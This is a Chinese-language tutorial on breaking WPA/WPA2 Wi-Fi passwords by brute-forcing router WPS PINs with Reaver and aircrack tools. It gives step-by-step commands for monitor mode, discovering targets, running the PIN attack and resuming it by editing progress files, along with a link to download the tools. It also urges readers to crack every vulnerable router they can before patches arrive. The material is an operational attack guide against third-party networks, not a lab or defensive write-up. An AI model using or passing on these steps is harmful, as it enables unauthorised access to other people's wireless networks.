wpa/wpa2无线网pin码破解

破解所需资料工具软件集：http://www.400gb.com/u/156037

Reaver基本命令参数

XiaoPanOS下：

选择“终端”输入sudo thunar

这里是为了取得超级权限，选择系统文件-usr-local-ect-reave

ifconfig –a //确认你用哪一个网卡WLAN0或WLAN1

airmon-ng start wlan0 //开启监听模式

wash –i mon0 –C //查看开启wps的无线路由器

airodump-ng mon0 //查看周边AP信息（抓包）

reaver –i mon0 –b MAC –a –S –vv –d 3 –t 3 //开始穷举PIN码

reaver –i mon0 –b MAC –a –S –vv –d 0 //加快速度为1秒

reaver –i mon0 –b MAC –a –S –vv –p xxxx //从前4位PIN码开始

reave的进度表文件保存在:

1.3版：/etc/reaver/MAC地址.wpc

1.4版：/usr/local/etc/reaver/MAC地址.wpc

CDliunx下：

选择“终端”输入sudo thunar

这里是为了取得超级权限，选择系统文件-usr-local-ect-reaver-

reaver必需的参数:

-i, --interface=wlan Name of the monitor-mode interface to use //监视模式接口使用的名称

-b, --bssid=mac BSSID of the target AP //目标AP的SSID

reaver可选参数:

-m, --mac=mac MAC of the host system //主机系统的MAC

-e, --essid=ssid ESSID of the target AP //目标AP的ESSID

-c, --channel=channel Set the 802.11 channel for the interface (implies -f)

//设置接口的802.11信道 (意味着 -f)

-o, --out-file=file Send output to a log file [stdout] //输出发送到一个日志文件

-s, --session=file Restore a previous session file //恢复以前的记录文件

-C, --exec=command Execute the supplied command upon successful pin recovery

//所提供的命令执行成功后，pin 恢复

-D, --daemonize Daemonize reaver //守护进程 reaver

-a, --auto Auto detect the best advanced options for the target AP

//自动检测目标AP的最先进的选项

-f, --fixed Disable channel hopping //禁用信道跳频

-5, --5ghz Use 5GHz 802.11 channels //使用5GHz的802.11信道

-v, --verbose Display non-critical warnings (-vv for more) //显示非关键的警告（- VV更多）

-q, --quiet Only display critical messages //仅显示重要消息

-h, --help Show help //显示帮助

reaver高级选项：

-p, --pin=wps pin Use the specified 4 or 8 digit WPS pin //使用指定的4个或8个的 pin WPS

-d, --delay=seconds Set the delay between pin attempts [1] //设置pin尝试之间的延迟[1]

-l, --lock-delay=seconds Set the time to wait if the AP locks WPS pin attempts [60]

//设置等待的时间，如果AP锁定WPS PIN尝试[60]

-g, --max-attempts=num Quit after num pin attempts //退出后NUM pin尝试

-x, --fail-wait=seconds Set the time to sleep after 10 unexpected failures [0]

//设定时间后进入休眠10[0]意外故障

-r, --recurring-delay=xy Sleep for y seconds every x pin attempts //对每一个pin码尝试Y秒

-t, --timeout=seconds Set the receive timeout period [5] //设置接收超时时间[5]

-T, --m57-timeout=seconds Set the M5M7 timeout period [0.20] //设置M5M7超时期[0.20]

-A, --no-associate Do not associate with the AP (association must be done by another application)

//不要与AP关联（协会必须由另一个应用程序进行）

-N, --no-nacks Do not send NACK messages when out of order packets are received

//不要发送NACK消息收到时，为了包出

-S, --dh-small Use small DH keys to improve crack speed //使用小DH密钥，以提高PJ速度

-L, --ignore-locks Ignore locked state reported by the target AP //忽略锁定状态的目标AP

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet

//终止每一个EAP失败包WPS的记录

-n, --nack Target AP always sends a NACK [Auto] //目标AP发送一个NACK[自动]

-w, --win7 Mimic a Windows 7 registrar [False] //模仿Windows 7的注册处处长[虚假]

reaver 使用方法和技巧:

reaver使用方法:

reaver -i mon0 -b xx:xx:xx:xx:xx -a -S -vv -c 频道

-i 监听后接口名称

-b 目标mac地址

-a 自动检测目标AP最佳配置

-S 使用最小的DH key，可以提高PJ速度

-vv 显示更多的非严重警告

-d 即delay每穷举一次的闲置时间预设为1秒

-c 频道

-p PIN码四位或八位 //可以用8位直接找到密码。

当出现有百分数时你就可以用crtl+c来暂停，它会将reaver的进度表文件保存在

1.3版：/etc/reaver/MAC地址.wpc

1.4版：/usr/local/etc/reaver/MAC地址.wpc (tmp/minidwep/MAC地址.wpc)

用资源管理器，手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中，

下次重启动后，再手工复制到/etc/reaver/ 目录下即可。

注意需要取得ROOT权限,才可将wpc文件复制到/etc/reaver/ 目录下:

在终端模拟里面输入:

SUDO SU

SUDO THUNAR

reaver使用技巧:

1、将mac地址.wpc 备份后，下次可以继续使用。

2、程序默认每尝试后停止一秒，加入-d0参数使之不停止：

reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d0

3、-p参数：-p PIN可以让你在获取到PIN的情况下直接得到路由WPA密码！

reaver-i mon0 -b MAC -p PIN

4、wpc结构

0 //这个地方是说它的前4位PIN码的进度位置数，真实位置要+4

0 //这个地方是说后3位PIN数的已经运行测试位置数

0 //0时没有找到，当为1时找到前四位，当为2时全部找到。

下面是1万个前四位数（reaver1.3版4位随机数，1.4版是升序）

第4行起

0000

0001

9999

下面是1千个三位数（PIN第八位数是验证码）

从1004行起

000

999
所以前四位很重要，将已经知道的前四位放在最前面会提高你的PIN速度，我们也可以手动修改wpc文件第一行，如我们要从3000开始pin你可以将它修改为3004,这样它就会从3000开始PIN了。当我们在PIN时就可以不用保存虚拟机快照了，只要你记住了前四位，你下载用软件修改WPC文件就可了。

cdlinux对wpc文件最方便，

beini和xiaopan对wpc修改要用命令vi来修改，

vi的使用方法很简单viXXXX.wpc打开就可以了，

输入i进行编辑，输入escap退回命令模式，输入:wq退出保存。

Pin码重复出现死循环解决之道:

1.xiaopanOS环境解决之道：

当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，保持原窗口不变，再点击ROOTSHELL图标，新开一个PIN窗口，输入 “reaver -i mon0 -b （正在PIN的目标MAC） -a -s -vv ”(注意：这里“S”要小写) 那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！如果是破解到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSID。

2.CDlinux环境解决之道：

当你看到PIN到一定程度，窗口里的PIN码不变、进度百分比也不走，那么，请Ctrl+C停止，然后点击[Reaver]按钮，在弹出的窗口中输入“-a -s –vv“ (注意：这里“S”要小写) 那么，你就会发现原来PIN的窗口，PIN码开始改变，进度开始前进了！而且PIN的时间也大为缩短了！,如果是破解到99.99%，执行此部操作就马上弹出正确的pin码和wifi密码，以及路由器的SSID。

若到90.9%或99.9%还是不出，也可以试试“reaver -i mon0 -b (正在PIN的目标MAC) -v -a -n [-c]”

时间及经验总结，基本90.9%和99.9%的死循环，已经100%成功了，最后祝大家破解愉快！

用Reaver pin码破特点：

1、不需要客户端，

2、有PIN码就能获得无线密码，

3、八位数PIN码实际只有一万一千组随机密码，

4、抓包、EWSA跑包，每个环节都有很大的不确定性。而PIN破密，只要开户WPS，破密只是个时间问题。

提醒：大家还是早点都把能pin的路由都破了！可能马上就有安全补救方案出来了！到时候就没机会了，时不我待、只争朝夕！

BT5、CDlinux、beini、xiaopan-OS都支持reaver运行。

reaver使用方法、步骤：

打开超级终端 root shell

如果电脑装有多个无线网卡，请先发指令ifconfig -a确认你用哪一个网卡WLAN0或WLAN1

下面的指令都是以单一网卡WLAN0为例

一、激活监听模式： airmon-ng start wlan0

二、查看周边AP信息（抓包）：airodump-ng mon0

观察要破AP的PWR信号强弱变化，注意同频干扰，调整网卡放置位置和角度、方向。

PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(2-6秒攻击一次)

三、按Ctrl+C终止抓包

四、抓PIN码： reaver -i mon0 -b MAC -vv

例如：reaver -i mon0 -b C8:3A:35:F6:BB:B8 –vv

1.4版可用：reaver -i mon0 -b C8:3A:35:F6:BB:B8 -v（可用一个v）

注意，MAC中冒号不可省略，MAC地址的字母大小写均可， -vv是两个V不是W！

reaver1.3感觉比1.4更稳定些。

特别提示：只有AP开启了WPS、QSS功能，才可以用PIN法破PSK密码!

如何查看AP是否开了WPS、QSS呢？

一、使用指令: airodump -ng mon0

MB一栏下，出现54e.（看清楚有点“.”）是开WPS的

二、WIN7下，用通常的方式连接AP，如果在提示输入密码框下面，出现“通过按路由器按钮也可以连接”，就确认此AP开了WPS、QSS。但是，WIN7下不出现“通过按路由器按钮也可以连接”，不等于100%没开WPS。还是 54e. 准。

AP关闭了WPS、或者没有QSS滴，会出现“WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)”

PIN破密对信号要求极为严格，如果信号稍差，可能导致破密进度变慢或者路由死锁等（重复同一个PIN码或 timeout）。
特别是1、6默认频道中，有较多的AP，相互干扰。因此，确定网卡放置的最佳位置、方向、角度十分重要。

破解过程中重复同一个PIN码或timeout可随时随地按Ctrl+C终止，reaver会自动保存进度。

若继续破，则再次在终端中发送: reaver -i mon0 -b MAC -vv，这个命令运行后，会让你选y或n，选y后就继续了。

当reaver确定前4位PIN密码后，其工作完成任务进度数值将直接跳跃至90.9%以上，也就是说只剩余一千个密码组合了。
总共一万一千个密码。

如果，90.9%进程后死机或停机，请记下PIN前四位数，用指令：

reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)

会从指定PIN段起破密。

如何保存破密进程呢：

reave的进度表文件保存在

1.3版：/etc/reaver/MAC地址.wpc

1.4版：/usr/local/etc/reaver/MAC地址.wpc

用资源管理器，手工将以MAC地址命名的、后辍为wpc的文件拷贝到U盘或硬盘中，下次重启动后，再手工复制到/etc/reaver/ 目录下即可。CDLINUX下可以粘贴在CDLINUX的桌面上但就是不能粘贴在 usr/local/etc/reaver里面，
解决方法：

新开个窗口输入 sudo thunar，这样打开的文件管理器，具有root权限，可以拷贝文件到任何目录了！

timeout时，可适当调整网卡方位，在同一PIN数值反复测试。也可Ctrl+C终止破密，让路由器休息几十秒，也是不错的选择，否则个别型号AP会自锁PIN连接功能。

另外，也可以给命令增加2个参数，延长PIN穷举和反馈的响应时间避免路由当机。

reaver -i mon0 -b MAC -a -S -vv -d 3 -t 3

-d 即delay每穷举一次的闲置时间预设为1秒

-t 即timeout每次穷举等待反馈的最长时间

wpa/wpa2无线网pin码破解相关推荐

BackTrack5利用路由PIN码破解无线路由WPA2密钥
airmon-ng start wlan0 //将无线网卡设置为监控模式 airodump-ng -i mon0 //获得周围无线路由信息 wash -i mon0 -C //查看支持 ...
关于pin码破解的原理和reaver参数的解释
路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举pin码,达到破解的目的,尤其现在很多路由器默认开启了wps功能.大家可能会想到8位的随机pin码将会有100000000种情况,这要 ...
BackTrack5 PIN码破解无线路由器
首先PIN 码破解五点要求: 1. 目标路由器开启 WPS 功能 2. 信号质量要好 3. 信号质量要好 4. 信号质量要好 5. 信号质量要好 0. 如果你用的高增益天线如
无线安全专题_破解篇02--kali破解pin码
最近项目有点紧,所以本应该上周发的文章,拖到了本周三,在此说声抱歉.无线安全专题,我打算系统地写六个部分,分别为破解篇,攻击篇,欺骗篇,路由篇,移动篇和蓝牙篇,当然在发布的过程中,可能还会掺杂着发布f ...
wpa/wpa2破解系统(CDlinux)U盘启动傻瓜教程
CDlinux是破解无线wifi信号的很好用的系统.它就像一个PE,不过它是基于Linux内核的微型系统.里面的破解工具很齐全,既有传统的抓包工具,也有最新的PIN码破解软件,而且针对windows用 ...
Wi-Fi无线网络（WPA2加密）快速破解 ——某公司无线设备安全隐患报告
Wi-Fi无线网络(WPA2加密)快速破解 --某公司无线设备安全隐患报告评估人:阿牛 2013年12月12日文件夹一. 导言 2 二. 背景 2 三. 无线产品应当採取的安全策略 3 四. 存 ...
Reaver跑pin码+Mdk3无线攻击笔记
实例三-Reaver跑pin码破解wifi PIN码共分为8位,按 4 3 1分段,总共穷举有11000种组合.通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码. 容易碰 ...
WPA/WPA2加密破解
WPA/WPA2无线密码破解这里主要介绍两种方法:穷举PIN码.穷举密码穷举PIN码(共11000种组合)破解速度快,需要一些条件(路由器支持WPS.QSS功能),路由器信号良好.无论密码多复杂,条 ...
Raspberry Pi下跑aircrack和reaver破解路由器PIN码
在freebuf看到不少好文章,各种转载,留着以后用小编:感谢minyoni的分享,freebuf希望这种从安装到安全测试全过程的paper越来越多,让国内安全paper与国外一样细致和专业. 声明 ...
Kali如何使用Reaver破解Wi-Fi网络的WPA/WPA2密码
首先,我们需要在虚拟机VMware中安装kali系统,关于如何安装kali系统,我的博客里也有介绍:然后要准备一个USB无线网卡,我用的是小米随身wifi. 我们要先了解Reaver的原理:它利用了W ...

wpa/wpa2无线网pin码破解

wpa/wpa2无线网pin码破解相关推荐

最新文章

热门文章